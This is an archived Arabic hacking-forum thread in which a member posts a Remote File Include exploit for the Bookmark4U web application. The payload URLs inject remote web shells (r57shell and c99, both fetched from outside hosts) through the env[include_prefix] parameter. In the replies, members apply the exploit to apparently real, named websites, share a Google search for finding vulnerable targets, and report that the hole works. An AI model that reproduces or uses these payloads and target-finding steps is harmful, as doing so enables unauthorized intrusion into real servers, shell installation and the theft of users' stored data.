المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغرة انكلود في Bookmark4U من اكتشافي,,

متكي ورا الشمس
06-06-2006, 06:38
السلام عليكم ورحمة الله وبركاته ,,
نوع الثغرة: Remote File Include

البرنامج المصاب: Bookmark4U


وهو برنامج للمحافظ على ماعتقد ,, حيث انه يقوم بحفظ ملفاتك بسريه على النت ,, يعني تخيل كم من المعلومات السريه التي يحتويها ,, بفرض ان كل واحد يجي ويضيف ملفاته المهمه داخل هذا البرنامج ,,

طريقة الاستغلال:

http://www.example.com/[Bookmark4Upath]/inc/dbase.php?env[include_prefix]=[evil_scripts]

http://www.example.com/[Bookmark4Upath]/inc/config.php?env[include_prefix]=[evil_scripts]

http://www.example.com/[Bookmark4Upath]/inc/common.php?env[include_prefix]=[evil_scripts]

http://www.example.com/[Bookmark4Upath]/inc/function.php?env[include_prefix]=[evil_scripts]

اختر اي واحد من الملفات السابقة وغير عليه المتغيرات
www.example.com = الموقع المصاب.
[Bookmark4Upath] = مجلد البرنامج على الموقع.
[evil_scripts] = تحط بدالها رابط الشل على شكل تكست , , يعني تستبدلها بالاتي..
http://rst.void.ru/download/r57shell.txt?cmd


----------------------------------------

هنا رابط تسجيل الثغره بالسكيورتي :

http://www.securityfocus.com/archive/1/435964/30/0/threaded

وهنا تسجيلها مع الاستغلال :

http://www.securityfocus.com/bid/18281/info

-------------------
تحياتي للجميع (SnIpEr_SA)
بورير
06-06-2006, 07:15
مشكووووووووور أخي ...

ولكن للأسف ماوجدة أي موقع مصاب ...

وهذه عدة تطبيقات أرجو أن تنبهني إذا في خطأ مني في الرابط

http://cvs.sourceforge.net/viewcvs.py/bookmark4u/inc/config.php?env[include_prefix]=http://www.members.lycos.co.uk/bourair/c99.txt?cmd

وهذا

http://whi.wts.edu/bookmark4u/inc/config.php?env[include_prefix]=http://www.members.lycos.co.uk/bourair/c99.txt?cmd

علماً أنني أبحث بهذه الطريقة :

inurl:"Bookmark4U"

يعني إذا في طريقة أفضل يا ريت تقلي ...

وبالمناسبة هذه الثغرة لأي المنتديات أو المواقع يعني phpbb أو vbultien أو ...

أو لأي واحد فيه هذا البرنامج

مع أطيب التحيات

أخوك

--------
إحترامي
--------
متكي ورا الشمس
06-06-2006, 08:49
http://www.julaine.ca/bookmark4u/inc/config.php?env[include_prefix]=http://www.members.lycos.co.uk/bourair/c99.txt?cmd

:)
متكي ورا الشمس
06-06-2006, 08:56
http://vxml.widerthan.com/bookmark4u/inc/config.php?env[include_prefix]=http://www.members.lycos.co.uk/bourair/c99.txt?cmd
فـ الحربي ـهد
06-06-2006, 08:56
تسلم يمينك يالذيب

وجاري التطبيق ....


وننتظر المزيد منك يا مبدع العاصفة ...

اخوك فهد الحربي ....
متكي ورا الشمس
06-06-2006, 09:06
تسلم يمينك يالذيب

وجاري التطبيق ....


وننتظر المزيد منك يا مبدع العاصفة ...

اخوك فهد الحربي ....


حياك الله يالغالي ,,

شاكر مرورك.......
مافيا العرب
06-06-2006, 10:40
مبدع يا متكي |28|

وجاري التجربة

تحياتي ليك |38|
ورود القبر
06-06-2006, 11:20
شكرا لك و الثغره شغاله
كيفن ميتنك
07-06-2006, 04:19
كيفن ميتنك
السلام عليكم ورحمة الله وبركاته
مشكور اخوي على الثغرة

لكن بسألك موضوعي ع نالشلات المرفوعة اخوي ويش صار فيه


ممكن اعرف من شاله وليش وشكرا
اخوك المحب

كيفن ميتنك


][تم تعديل مشاركتكـ منـ نايس بوي ][
][ وعيب عليك اتكلم بالاسلوب هذا ..][
][ وخلك اكبر من هالالفاظ .. ][
BroKeN-ProXy
07-06-2006, 10:43
مبرووووووووك أخوي متكي على الاكتشاف
وعقبالنا إن شاء الله
أخوك بروكين
BroKeN-ProXy
07-06-2006, 10:45
مبرووووووووك أخوي متكي على الاكتشاف|28|
وعقبالنا إن شاء الله
أخوك بروكين:)
قائد
07-06-2006, 12:23
مبرووووووووووك على الاكتشاف looool
Dr KrM
07-06-2006, 10:43
مشكور ياغالي عل الكتشاف الحلو دة في انتظار منك المزيد والمزيد
تحياتي Dr KrM
h1r@hotmail.co.uk
الملك18
07-06-2006, 11:09
مشكور اخوي متكي

ومبروك الاكتشاف خيوو ...
حليب السعوديه
08-06-2006, 05:05
مشكور يا اخ متكي فعلا مبدع و ربنا يوفقك
متكي ورا الشمس
08-06-2006, 06:33
العفوو اخواني .......... شاكر مروركم .
سعـــــــ 2005 ـــــــودي
08-06-2006, 08:03
تسلم متكي يعطيك الف عافيه

ومبرووك الاكتشاف وبانتظار الجديد

تحياتي لك يااكابتن
متكي ورا الشمس
10-06-2006, 10:07
العفوو اخواني ...... شاكر ردودكم

يسلموو على الردود المشجعه,,,
مسمار جحا
10-06-2006, 04:50
وربي انك استاذ هكر
الله يعطيك الف مليون عافية اخوي متكى
الى الامام والله يوفقك
اخوك
مسمار جحا
a_alsayad
18-06-2006, 11:57
مشكوووووووووووووووووووووووورررررررررررررررررررر
وجاري التجربة
وان اشاء الله ربنا يكرمك اكثر